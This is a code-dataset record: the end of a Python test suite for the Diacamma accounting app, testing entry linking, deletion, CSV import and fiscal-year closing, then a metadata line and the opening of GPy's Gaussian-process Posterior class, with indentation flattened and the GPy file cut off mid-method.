self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountLink')
self.factory.xfer = EntryAccountList()
self.calljson('/diacamma.accounting/entryAccountList', {'year': '1', 'journal': '0', 'filter': '0'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountList')
self.assert_count_equal('entryline', 7)
self.assert_json_equal('', 'entryline/@0/id', '2')
self.assert_json_equal('', 'entryline/@0/link', 'A')
self.assert_json_equal('', 'entryline/@1/id', '1')
self.assert_json_equal('', 'entryline/@1/link', None)
self.assert_json_equal('', 'entryline/@5/id', '3')
self.assert_json_equal('', 'entryline/@5/link', 'A')
self.assert_json_equal('', 'entryline/@6/id', '4')
self.assert_json_equal('', 'entryline/@6/link', None)
self.factory.xfer = EntryAccountLink()
self.calljson('/diacamma.accounting/entryAccountLink', {'CONFIRME': 'YES', 'year': '1', 'journal': '0', 'filter': '0', 'entryline': '3'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountLink')
self.factory.xfer = EntryAccountList()
self.calljson('/diacamma.accounting/entryAccountList', {'year': '1', 'journal': '0', 'filter': '0'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountList')
self.assert_count_equal('entryline', 7)
self.assert_json_equal('', 'entryline/@0/link', None)
self.assert_json_equal('', 'entryline/@1/link', None)
self.assert_json_equal('', 'entryline/@2/link', None)
self.assert_json_equal('', 'entryline/@3/link', None)
self.factory.xfer = EntryAccountLink()
self.calljson('/diacamma.accounting/entryAccountLink', {'year': '1', 'journal': '0', 'filter': '0', 'entryline': '1;2'}, False)
self.assert_observer('core.exception', 'diacamma.accounting', 'entryAccountLink')
self.assert_json_equal('', 'message', "Une ligne d'écriture n'a pas de compte de tiers !")
self.factory.xfer = EntryAccountLink()
self.calljson('/diacamma.accounting/entryAccountLink', {'year': '1', 'journal': '0', 'filter': '0', 'entryline': '2;5'}, False)
self.assert_observer('core.exception', 'diacamma.accounting', 'entryAccountLink')
self.assert_json_equal('', 'message', "Ces lignes d'écritures ne concernent pas le même tiers !")
self.factory.xfer = EntryAccountLink()
self.calljson('/diacamma.accounting/entryAccountLink', {'year': '1', 'journal': '0', 'filter': '0', 'entryline': '2;6'}, False)
self.assert_observer('core.exception', 'diacamma.accounting', 'entryAccountLink')
self.assert_json_equal('', 'message', "Ces lignes d'écritures ne s'équilibrent pas !")
def test_delete_lineentry(self):
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit', {'SAVE': 'YES', 'year': '1', 'journal': '2',
'date_value': '2015-04-27', 'designation': 'Une belle facture'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountEdit')
self.factory.xfer = EntryAccountValidate()
self.calljson('/diacamma.accounting/entryAccountValidate',
{'year': '1', 'journal': '2', 'entryaccount': '1', 'serial_entry': "-6|9|0|364.91|0|0|None|\n-7|1|5|364.91|0|0|None|"}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountValidate')
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit',
{'year': '1', 'journal': '2', 'entryaccount': '1'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountEdit')
self.assert_count_equal('', 13)
self.assert_count_equal('entrylineaccount_serial', 2)
self.assertEqual(len(self.json_actions), 5)
self.factory.xfer = EntryLineAccountDel()
self.calljson('/diacamma.accounting/entryLineAccountDel', {'year': '1', 'journal': '2', 'entryaccount': '1',
'serial_entry': "1|9|0|364.91|0|0|None|\n2|1|5|364.91|0|0|None|", "entrylineaccount_serial": '2'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryLineAccountDel')
self.assertEqual(self.response_json['action']['id'], "diacamma.accounting/entryAccountEdit")
self.assertEqual(len(self.response_json['action']['params']), 1)
self.assertEqual(self.response_json['action']['params']['serial_entry'], "1|9|0|364.910000|0|0|None|")
self.assertEqual(len(self.json_context), 3)
self.assertEqual(self.json_context['entryaccount'], "1")
self.assertEqual(self.json_context['year'], "1")
self.assertEqual(self.json_context['journal'], "2")
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit',
{'year': '1', 'journal': '2', 'entryaccount': '1', "entrylineaccount_serial": '2', 'serial_entry': "1|9|0|364.91|0|0|None|"}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountEdit')
self.assert_count_equal('', 13)
self.assert_count_equal('entrylineaccount_serial', 1)
self.assertEqual(len(self.json_actions), 2)
def test_delete_entries(self):
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit', {'SAVE': 'YES', 'year': '1', 'journal': '2',
'date_value': '2015-04-27', 'designation': 'Une belle facture'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountEdit')
self.factory.xfer = EntryAccountValidate()
self.calljson('/diacamma.accounting/entryAccountValidate',
{'year': '1', 'journal': '2', 'entryaccount': '1', 'serial_entry': "-6|9|0|364.91|0|0|None|\n-7|1|5|364.91|0|0|None|"}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountValidate')
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit', {'SAVE': 'YES', 'year': '1', 'journal': '4',
'date_value': '2015-05-03', 'designation': 'Règlement de belle facture'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountEdit')
self.factory.xfer = EntryAccountValidate()
self.calljson('/diacamma.accounting/entryAccountValidate',
{'year': '1', 'journal': '4', 'entryaccount': '2', 'serial_entry': "-9|1|5|-364.91|0|0|None|\n-8|2|0|364.91|0|0|BP N°987654|"}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountValidate')
self.factory.xfer = EntryAccountLink()
self.calljson('/diacamma.accounting/entryAccountLink',
{'year': '1', 'journal': '0', 'filter': '0', 'entryline': '2;3'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountLink')
self.factory.xfer = EntryAccountList()
self.calljson('/diacamma.accounting/entryAccountList',
{'year': '1', 'journal': '0', 'filter': '0'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountList')
self.assert_count_equal('', 8)
self.assert_count_equal('entryline', 4)
self.assert_json_equal('', 'entryline/@0/link', 'A')
self.assert_json_equal('', 'entryline/@0/entry_account', '[411 Dalton William]')
self.assert_json_equal('', 'entryline/@0/costaccounting', None)
self.assert_json_equal('', 'entryline/@1/link', None)
self.assert_json_equal('', 'entryline/@1/entry_account', '[706] 706')
self.assert_json_equal('', 'entryline/@1/costaccounting', None)
self.assert_json_equal('', 'entryline/@2/link', 'A')
self.assert_json_equal('', 'entryline/@2/entry_account', '[411 Dalton William]')
self.assert_json_equal('', 'entryline/@2/costaccounting', None)
self.assert_json_equal('', 'entryline/@3/link', None)
self.assert_json_equal('', 'entryline/@3/entry_account', '[512] 512')
self.assert_json_equal('', 'entryline/@3/costaccounting', None)
self.factory.xfer = EntryAccountDel()
self.calljson('/diacamma.accounting/entryAccountDel',
{'CONFIRME': 'YES', 'year': '1', 'journal': '0', 'filter': '0', 'entryline': '1'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountDel')
self.factory.xfer = EntryAccountClose()
self.calljson('/diacamma.accounting/entryAccountClose',
{'CONFIRME': 'YES', 'year': '1', 'journal': '0', 'filter': '0', "entryline": "3"}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountClose')
self.factory.xfer = EntryAccountList()
self.calljson('/diacamma.accounting/entryAccountList',
{'year': '1', 'journal': '0', 'filter': '0'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountList')
self.assert_count_equal('entryline', 2)
self.assert_json_equal('', 'entryline/@0/entry.num', '1')
self.assert_json_equal('', 'entryline/@0/link', None)
self.assert_json_equal('', 'entryline/@0/entry_account', '[411 Dalton William]')
self.assert_json_equal('', 'entryline/@1/entry_account', '[512] 512')
self.assert_json_equal('', 'entryline/@1/debit', -364.91)
self.assert_json_equal('', 'entryline/@1/designation_ref', 'Règlement de belle facture{[br/]}BP N°987654')
self.assert_json_equal('LABELFORM', 'result', [0.00, 0.00, 0.00, 364.91, 364.91])
self.factory.xfer = EntryAccountDel()
self.calljson('/diacamma.accounting/entryAccountDel',
{'year': '1', 'journal': '0', 'filter': '0', 'entryline': '3'}, False)
self.assert_observer('core.exception', 'diacamma.accounting', 'entryAccountDel')
self.assert_json_equal('', 'message', 'écriture validée !')
def test_buyingselling_in_report(self):
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit', {'SAVE': 'YES', 'year': '1', 'journal': '1',
'date_value': '2015-03-21', 'designation': 'mauvais report'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountEdit')
self.factory.xfer = EntryLineAccountAdd()
self.calljson('/diacamma.accounting/entryLineAccountAdd', {'year': '1', 'journal': '1', 'entryaccount': '1', 'num_cpt_txt': '70',
'num_cpt': '9', 'third': 0, 'debit_val': '0.0', 'credit_val': '152.34'}, False)
self.assert_observer('core.exception', 'diacamma.accounting', 'entryLineAccountAdd')
self.assert_json_equal('', 'message', "Ce type d'écriture n'est pas permis dans ce journal !")
self.factory.xfer = EntryLineAccountAdd()
self.calljson('/diacamma.accounting/entryLineAccountAdd', {'year': '1', 'journal': '1', 'entryaccount': '1', 'num_cpt_txt': '60',
'num_cpt': '13', 'third': 0, 'debit_val': '0.0', 'credit_val': '152.34'}, False)
self.assert_observer('core.exception', 'diacamma.accounting', 'entryLineAccountAdd')
self.assert_json_equal('', 'message', "Ce type d'écriture n'est pas permis dans ce journal !")
self.factory.xfer = EntryLineAccountAdd()
self.calljson('/diacamma.accounting/entryLineAccountAdd', {'year': '1', 'journal': '1', 'entryaccount': '1', 'num_cpt_txt': '401',
'num_cpt': '4', 'third': 0, 'debit_val': '0.0', 'credit_val': '152.34'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryLineAccountAdd')
def test_import_entries(self):
default_costaccounting()
fill_thirds_fr()
csv_content = """date;code;description;debit;credit;third;cost;ref
04/09/2015;512; Retrait;1 000,00;;;;
04/09/2015;531; Retrait;;1 000,00;;;
05/09/2015;512;Virement ;1234.56 EUR;;;;#ABC987654
05/09/2015;411;Virement ;;1234.56 EUR;Minimum;;
06/09/2015;701;Sell;;321.47;;open;
06/09/2015;706;Sell;;366,51;;;
06/09/2015;411;Sell;687,98;;Dalton Joe;;
07/09/2015;512;Bad sum;123;;;;
07/09/2015;531;Bad sum;;456;;;
08/09/2015;515;Bad code;20,00;;;;
08/09/2015;531;Bad code;;20,00;;;
09/09/2015;106;alone;99999.99;;;;
10/09/2015;601;Wrong buy;30.02;;;bad;
10/09/2015;602;Wrong buy;37.01;;;close;
10/09/2015;401;Wrong buy;;67.03;Valjean Jean;;
11/09/2016;512;Bad date;500,00;;;;
11/09/2016;531;Bad date;;500,00;;;
"""
self.factory.xfer = EntryAccountImport()
self.calljson('/diacamma.accounting/entryAccountImport', {'step': 1, 'year': 1, 'journal': 5, 'quotechar': "'",
'delimiter': ';', 'encoding': 'utf-8', 'dateformat': '%d/%m/%Y', 'csvcontent': StringIO(csv_content)}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountImport')
self.assert_count_equal('', 15)
self.assert_json_equal('LABELFORM', 'year', 'Exercice du 1 janvier 2015 au 31 décembre 2015 [en création]')
self.assert_json_equal('LABELFORM', 'journal', 'Opérations diverses')
self.assert_select_equal('fld_entry.date_value', 8)
self.assert_select_equal('fld_entry.designation', 8)
self.assert_select_equal('fld_account', 8)
self.assert_select_equal('fld_debit', 8)
self.assert_select_equal('fld_credit', 8)
self.assert_select_equal('fld_third', 9)
self.assert_select_equal('fld_reference', 9)
self.assert_select_equal('fld_costaccounting', 9)
self.assert_count_equal('CSV', 17)
self.assert_count_equal('#CSV/actions', 0)
self.factory.xfer = EntryAccountImport()
self.calljson('/diacamma.accounting/entryAccountImport', {'step': 2, 'year': 1, 'journal': 5, 'quotechar': "'", 'delimiter': ';',
'encoding': 'utf-8', 'dateformat': '%d/%m/%Y', 'csvcontent0': csv_content,
"fld_entry.date_value": "date", "fld_entry.designation": "description", "fld_account": "code",
'fld_debit': 'debit', 'fld_credit': 'credit', 'fld_third': 'third',
'fld_reference': 'ref', 'fld_costaccounting': 'cost'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountImport')
self.assert_count_equal('', 5)
self.assert_count_equal('CSV', 17)
self.assert_count_equal('#CSV/actions', 0)
self.factory.xfer = EntryAccountImport()
self.calljson('/diacamma.accounting/entryAccountImport', {'step': 3, 'year': 1, 'journal': 5, 'quotechar': "'", 'delimiter': ';',
'encoding': 'utf-8', 'dateformat': '%d/%m/%Y', 'csvcontent0': csv_content,
"fld_entry.date_value": "date", "fld_entry.designation": "description", "fld_account": "code",
'fld_debit': 'debit', 'fld_credit': 'credit', 'fld_third': 'third',
'fld_reference': 'ref', 'fld_costaccounting': 'cost'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountImport')
self.assert_count_equal('', 4)
self.assert_json_equal('LABELFORM', 'result', "4 éléments ont été importés")
self.assert_json_equal('LABELFORM', 'import_error', ["Écriture comptable non équilibré{[br/]}total crédit=333,00\xa0€ - total débit=0,00\xa0€",
'Code comptable "515" inconnu !',
"L'écriture 'Bad code' n'a qu'une seule ligne.",
"L'écriture 'alone' n'a qu'une seule ligne.",
"Comptabilité analytique 'bad' inconnue !",
"Comptabilité analytique 'close' inconnue !",
"Tiers 'Valjean Jean' inconnu !",
"Date '2015-12-31' invalide !"])
self.assert_count_equal('entryline', 10)
self.assert_json_equal('', 'entryline/@0/entry.num', None)
self.assert_json_equal('', 'entryline/@0/link', None)
self.assert_json_equal('', 'entryline/@0/entry.date_value', '2015-09-04')
self.assert_json_equal('', 'entryline/@0/designation_ref', 'Retrait')
self.assert_json_equal('', 'entryline/@0/entry_account', '[512] 512')
self.assert_json_equal('', 'entryline/@0/costaccounting', None)
self.assert_json_equal('', 'entryline/@0/debit', -1000.00)
self.assert_json_equal('', 'entryline/@1/entry_account', '[531] 531')
self.assert_json_equal('', 'entryline/@1/costaccounting', None)
self.assert_json_equal('', 'entryline/@1/credit', 1000.00)
self.assert_json_equal('', 'entryline/@2/entry.date_value', '2015-09-05')
self.assert_json_equal('', 'entryline/@2/designation_ref', 'Virement')
self.assert_json_equal('', 'entryline/@2/entry_account', '[411 Minimum]')
self.assert_json_equal('', 'entryline/@2/costaccounting', None)
self.assert_json_equal('', 'entryline/@2/credit', 1234.56)
self.assert_json_equal('', 'entryline/@3/designation_ref', 'Virement{[br/]}#ABC987654')
self.assert_json_equal('', 'entryline/@3/entry_account', '[512] 512')
self.assert_json_equal('', 'entryline/@3/costaccounting', None)
self.assert_json_equal('', 'entryline/@3/debit', -1234.56)
self.assert_json_equal('', 'entryline/@4/entry.date_value', '2015-09-06')
self.assert_json_equal('', 'entryline/@4/designation_ref', 'Sell')
self.assert_json_equal('', 'entryline/@4/entry_account', '[411 Dalton Joe]')
self.assert_json_equal('', 'entryline/@4/costaccounting', None)
self.assert_json_equal('', 'entryline/@4/debit', -687.98)
self.assert_json_equal('', 'entryline/@5/entry_account', '[701] 701')
self.assert_json_equal('', 'entryline/@5/costaccounting', 'open')
self.assert_json_equal('', 'entryline/@5/credit', 321.47)
self.assert_json_equal('', 'entryline/@6/entry_account', '[706] 706')
self.assert_json_equal('', 'entryline/@6/costaccounting', None)
self.assert_json_equal('', 'entryline/@6/credit', 366.51)
self.assert_json_equal('', 'entryline/@7/entry.date_value', '2015-09-10')
self.assert_json_equal('', 'entryline/@7/designation_ref', 'Wrong buy')
self.assert_json_equal('', 'entryline/@7/entry_account', '[401] 401')
self.assert_json_equal('', 'entryline/@7/costaccounting', None)
self.assert_json_equal('', 'entryline/@7/credit', 67.03)
self.assert_json_equal('', 'entryline/@8/entry_account', '[601] 601')
self.assert_json_equal('', 'entryline/@8/costaccounting', None)
self.assert_json_equal('', 'entryline/@8/debit', -30.02)
self.assert_json_equal('', 'entryline/@9/entry_account', '[602] 602')
self.assert_json_equal('', 'entryline/@9/costaccounting', None)
self.assert_json_equal('', 'entryline/@9/debit', -37.01)
def test_link_entries_multiyear(self):
# data last year
self.factory.xfer = FiscalYearBegin()
self.calljson('/diacamma.accounting/fiscalYearBegin', {'CONFIRME': 'YES', 'year': '1', 'type_of_account': '-1'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'fiscalYearBegin')
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit', {'SAVE': 'YES', 'year': '1', 'journal': '2',
'date_value': '2015-12-27', 'designation': 'Une belle facture'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountEdit')
self.factory.xfer = EntryAccountValidate()
self.calljson('/diacamma.accounting/entryAccountValidate', {'year': '1', 'journal': '2', 'entryaccount': '1',
'serial_entry': "-6|9|0|364.91|0|0|None|\n-7|1|5|364.91|0|0|None|"}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountValidate')
self.factory.xfer = EntryAccountClose()
self.calljson('/diacamma.accounting/entryAccountClose',
{'CONFIRME': 'YES', 'year': '1', 'journal': '2', "entryline": "1"}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountClose')
# data new year
new_year = FiscalYear.objects.create(begin='2016-01-01', end='2016-12-31', status=0, last_fiscalyear_id=1)
fill_accounts_fr(new_year)
self.factory.xfer = ChartsAccountList()
self.calljson('/diacamma.accounting/chartsAccountList', {'year': '2', 'type_of_account': '-1'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'chartsAccountList')
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit', {'SAVE': 'YES', 'year': '2', 'journal': '4', 'date_value': '2016-01-03',
'designation': 'Règlement de belle facture'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountEdit')
self.factory.xfer = EntryAccountValidate()
self.calljson('/diacamma.accounting/entryAccountValidate', {'year': '2', 'journal': '4', 'entryaccount': '2',
'serial_entry': "-9|18|5|-364.91|0|0|None|\n-8|19|0|364.91|0|0|BP N°987654|"}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountValidate')
self.factory.xfer = EntryAccountClose()
self.calljson('/diacamma.accounting/entryAccountClose',
{'CONFIRME': 'YES', 'year': '2', 'journal': '4', "entryline": "4"}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountClose')
# begin test
self.factory.xfer = ThirdShow()
self.calljson('/diacamma.accounting/thirdShow', {"third": 5, 'lines_filter': 2}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'thirdShow')
self.assert_count_equal('entryline', 2)
self.assert_json_equal('', 'entryline/@0/id', '2')
self.assert_json_equal('', 'entryline/@0/entry.num', 1)
self.assert_json_equal('', 'entryline/@0/entry.date_value', '2015-12-27')
self.assert_json_equal('', 'entryline/@0/link', None)
self.assert_json_equal('', 'entryline/@0/entry_account', '[411 Dalton William]')
self.assert_json_equal('', 'entryline/@0/designation_ref', 'Une belle facture')
self.assert_json_equal('', 'entryline/@0/debit', -364.91)
self.assert_json_equal('', 'entryline/@0/costaccounting', None)
self.assert_json_equal('', 'entryline/@1/id', '3')
self.assert_json_equal('', 'entryline/@1/entry.num', 1)
self.assert_json_equal('', 'entryline/@1/entry.date_value', '2016-01-03')
self.assert_json_equal('', 'entryline/@1/link', None)
self.assert_json_equal('', 'entryline/@1/entry_account', '[411 Dalton William]')
self.assert_json_equal('', 'entryline/@1/designation_ref', 'Règlement de belle facture')
self.assert_json_equal('', 'entryline/@1/credit', 364.91)
self.assert_json_equal('', 'entryline/@1/costaccounting', None)
self.factory.xfer = EntryAccountLink()
self.calljson('/diacamma.accounting/entryAccountLink', {'entryline': '2;3'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountLink')
self.factory.xfer = ThirdShow()
self.calljson('/diacamma.accounting/thirdShow', {"third": 5, 'lines_filter': 2}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'thirdShow')
self.assert_count_equal('entryline', 2)
self.assert_json_equal('', 'entryline/@0/id', '2')
self.assert_json_equal('', 'entryline/@0/entry.num', 1)
self.assert_json_equal('', 'entryline/@0/entry.date_value', '2015-12-27')
self.assert_json_equal('', 'entryline/@0/link', "A&")
self.assert_json_equal('', 'entryline/@0/entry_account', '[411 Dalton William]')
self.assert_json_equal('', 'entryline/@0/designation_ref', 'Une belle facture')
self.assert_json_equal('', 'entryline/@0/debit', -364.91)
self.assert_json_equal('', 'entryline/@0/costaccounting', None)
self.assert_json_equal('', 'entryline/@1/id', '3')
self.assert_json_equal('', 'entryline/@1/entry.num', 1)
self.assert_json_equal('', 'entryline/@1/entry.date_value', '2016-01-03')
self.assert_json_equal('', 'entryline/@1/link', "A&")
self.assert_json_equal('', 'entryline/@1/entry_account', '[411 Dalton William]')
self.assert_json_equal('', 'entryline/@1/designation_ref', 'Règlement de belle facture')
self.assert_json_equal('', 'entryline/@1/credit', 364.91)
self.assert_json_equal('', 'entryline/@1/costaccounting', None)
self.factory.xfer = FiscalYearClose()
self.calljson('/diacamma.accounting/fiscalYearClose', {'CONFIRME': 'YES', 'year': '1', 'type_of_account': '-1'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'fiscalYearClose')
self.factory.xfer = ThirdShow()
self.calljson('/diacamma.accounting/thirdShow', {"third": 5, 'lines_filter': 2}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'thirdShow')
self.assert_count_equal('entryline', 3)
self.assert_json_equal('', 'entryline/@0/id', '2')
self.assert_json_equal('', 'entryline/@0/entry.num', 1)
self.assert_json_equal('', 'entryline/@0/entry.date_value', '2015-12-27')
self.assert_json_equal('', 'entryline/@0/link', "A")
self.assert_json_equal('', 'entryline/@0/entry_account', '[411 Dalton William]')
self.assert_json_equal('', 'entryline/@0/designation_ref', 'Une belle facture')
self.assert_json_equal('', 'entryline/@0/debit', -364.91)
self.assert_json_equal('', 'entryline/@0/costaccounting', None)
self.assert_json_equal('', 'entryline/@1/id', '7')
self.assert_json_equal('', 'entryline/@1/entry.num', 3)
self.assert_json_equal('', 'entryline/@1/entry.date_value', '2015-12-31')
self.assert_json_equal('', 'entryline/@1/link', "A")
self.assert_json_equal('', 'entryline/@1/entry_account', '[411 Dalton William]')
self.assert_json_equal('', 'entryline/@1/designation_ref', "Cloture d'exercice - Tiers{[br/]}Une belle facture")
self.assert_json_equal('', 'entryline/@1/credit', 364.91)
self.assert_json_equal('', 'entryline/@1/costaccounting', None)
self.assert_json_equal('', 'entryline/@2/id', '3')
self.assert_json_equal('', 'entryline/@2/entry.num', 1)
self.assert_json_equal('', 'entryline/@2/entry.date_value', '2016-01-03')
self.assert_json_equal('', 'entryline/@2/link', None)
self.assert_json_equal('', 'entryline/@2/entry_account', '[411 Dalton William]')
self.assert_json_equal('', 'entryline/@2/designation_ref', 'Règlement de belle facture')
self.assert_json_equal('', 'entryline/@2/credit', 364.91)
self.assert_json_equal('', 'entryline/@2/costaccounting', None)
self.factory.xfer = FiscalYearReportLastYear()
self.calljson('/diacamma.accounting/fiscalYearReportLastYear', {'CONFIRME': 'YES', 'year': '2', 'type_of_account': '-1'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'fiscalYearReportLastYear')
self.factory.xfer = ThirdShow()
self.calljson('/diacamma.accounting/thirdShow', {"third": 5, 'lines_filter': 2}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'thirdShow')
self.assert_count_equal('entryline', 4)
self.assert_json_equal('', 'entryline/@0/id', '2')
self.assert_json_equal('', 'entryline/@0/entry.num', 1)
self.assert_json_equal('', 'entryline/@0/entry.date_value', '2015-12-27')
self.assert_json_equal('', 'entryline/@0/link', "A")
self.assert_json_equal('', 'entryline/@0/entry_account', '[411 Dalton William]')
self.assert_json_equal('', 'entryline/@0/designation_ref', 'Une belle facture')
self.assert_json_equal('', 'entryline/@0/debit', -364.91)
self.assert_json_equal('', 'entryline/@0/costaccounting', None)
self.assert_json_equal('', 'entryline/@1/id', '7')
self.assert_json_equal('', 'entryline/@1/entry.num', 3)
self.assert_json_equal('', 'entryline/@1/entry.date_value', '2015-12-31')
self.assert_json_equal('', 'entryline/@1/link', "A")
self.assert_json_equal('', 'entryline/@1/entry_account', '[411 Dalton William]')
self.assert_json_equal('', 'entryline/@1/designation_ref', "Cloture d'exercice - Tiers{[br/]}Une belle facture")
self.assert_json_equal('', 'entryline/@1/credit', 364.91)
self.assert_json_equal('', 'entryline/@1/costaccounting', None)
self.assert_json_equal('', 'entryline/@2/id', '12')
self.assert_json_equal('', 'entryline/@2/entry.num', 3)
self.assert_json_equal('', 'entryline/@2/entry.date_value', '2016-01-01')
self.assert_json_equal('', 'entryline/@2/link', "A")
self.assert_json_equal('', 'entryline/@2/entry_account', '[411 Dalton William]')
self.assert_json_equal('', 'entryline/@2/designation_ref', 'Report à nouveau - Dette tiers{[br/]}Une belle facture')
self.assert_json_equal('', 'entryline/@2/debit', -364.91)
self.assert_json_equal('', 'entryline/@2/costaccounting', None)
self.assert_json_equal('', 'entryline/@3/id', '3')
self.assert_json_equal('', 'entryline/@3/entry.num', 1)
self.assert_json_equal('', 'entryline/@3/entry.date_value', '2016-01-03')
self.assert_json_equal('', 'entryline/@3/link', "A")
self.assert_json_equal('', 'entryline/@3/entry_account', '[411 Dalton William]')
self.assert_json_equal('', 'entryline/@3/designation_ref', 'Règlement de belle facture')
self.assert_json_equal('', 'entryline/@3/credit', 364.91)
self.assert_json_equal('', 'entryline/@3/costaccounting', None)
|
Diacamma2/financial
|
diacamma/accounting/tests_entries.py
|
Python
|
gpl-3.0
| 87,704
|
[
"Dalton"
] |
318c1de3e128ee05a30abaa16e57ddda414e66c632a81b54f18dba011b3da324
|
# Copyright (c) 2012, GPy authors (see AUTHORS.txt).
# Licensed under the BSD 3-clause license (see LICENSE.txt)
import numpy as np
from ...util.linalg import pdinv, dpotrs, dpotri, symmetrify, jitchol, dtrtrs, tdot
from GPy.core.parameterization.variational import VariationalPosterior
class Posterior(object):
"""
An object to represent a Gaussian posterior over latent function values, p(f|D).
This may be computed exactly for Gaussian likelihoods, or approximated for
non-Gaussian likelihoods.
The purpose of this class is to serve as an interface between the inference
    schemes and the model classes. The model class can make predictions for
the function at any new point x_* by integrating over this posterior.
"""
def __init__(self, woodbury_chol=None, woodbury_vector=None, K=None, mean=None, cov=None, K_chol=None, woodbury_inv=None, prior_mean=0):
"""
woodbury_chol : a lower triangular matrix L that satisfies posterior_covariance = K - K L^{-T} L^{-1} K
woodbury_vector : a matrix (or vector, as Nx1 matrix) M which satisfies posterior_mean = K M
        K : the prior covariance (required for lazy computation of various quantities)
mean : the posterior mean
cov : the posterior covariance
Not all of the above need to be supplied! You *must* supply:
K (for lazy computation)
or
K_chol (for lazy computation)
You may supply either:
woodbury_chol
woodbury_vector
Or:
mean
cov
Of course, you can supply more than that, but this class will lazily
        compute all other quantities on demand.
"""
#obligatory
self._K = K
if ((woodbury_chol is not None) and (woodbury_vector is not None))\
or ((woodbury_inv is not None) and (woodbury_vector is not None))\
or ((woodbury_inv is not None) and (mean is not None))\
or ((mean is not None) and (cov is not None)):
pass # we have sufficient to compute the posterior
else:
raise ValueError("insufficient information to compute the posterior")
self._K_chol = K_chol
self._K = K
#option 1:
self._woodbury_chol = woodbury_chol
self._woodbury_vector = woodbury_vector
        #option 2: the woodbury inverse (used together with the woodbury vector above)
        self._woodbury_inv = woodbury_inv
        #option 3: an explicit mean and covariance
self._mean = mean
self._covariance = cov
self._prior_mean = prior_mean
#compute this lazily
self._precision = None
@property
def mean(self):
"""
Posterior mean
$$
K_{xx}v
v := \texttt{Woodbury vector}
$$
"""
if self._mean is None:
self._mean = np.dot(self._K, self.woodbury_vector)
return self._mean
@property
def covariance(self):
"""
Posterior covariance
$$
K_{xx} - K_{xx}W_{xx}^{-1}K_{xx}
W_{xx} := \texttt{Woodbury inv}
$$
"""
if self._covariance is None:
#LiK, _ = dtrtrs(self.woodbury_chol, self._K, lower=1)
self._covariance = (np.atleast_3d(self._K) - np.tensordot(np.dot(np.atleast_3d(self.woodbury_inv).T, self._K), self._K, [1,0]).T).squeeze()
#self._covariance = self._K - self._K.dot(self.woodbury_inv).dot(self._K)
return self._covariance
@property
def precision(self):
"""
Inverse of posterior covariance
"""
if self._precision is None:
cov = np.atleast_3d(self.covariance)
self._precision = np.zeros(cov.shape) # if one covariance per dimension
for p in range(cov.shape[-1]):
self._precision[:,:,p] = pdinv(cov[:,:,p])[0]
return self._precision
@property
def woodbury_chol(self):
"""
return $L_{W}$ where L is the lower triangular Cholesky decomposition of the Woodbury matrix
$$
L_{W}L_{W}^{\top} = W^{-1}
W^{-1} := \texttt{Woodbury inv}
$$
"""
if self._woodbury_chol is None:
            #compute woodbury chol from the woodbury inverse
if self._woodbury_inv is not None:
winv = np.atleast_3d(self._woodbury_inv)
self._woodbury_chol = np.zeros(winv.shape)
for p in range(winv.shape[-1]):
self._woodbury_chol[:,:,p] = pdinv(winv[:,:,p])[2]
#Li = jitchol(self._woodbury_inv)
#self._woodbury_chol, _ = dtrtri(Li)
#W, _, _, _, = pdinv(self._woodbury_inv)
#symmetrify(W)
#self._woodbury_chol = jitchol(W)
#try computing woodbury chol from cov
elif self._covariance is not None:
raise NotImplementedError("TODO: check code here")
B = self._K - self._covariance
tmp, _ = dpotrs(self.K_chol, B)
self._woodbury_inv, _ = dpotrs(self.K_chol, tmp.T)
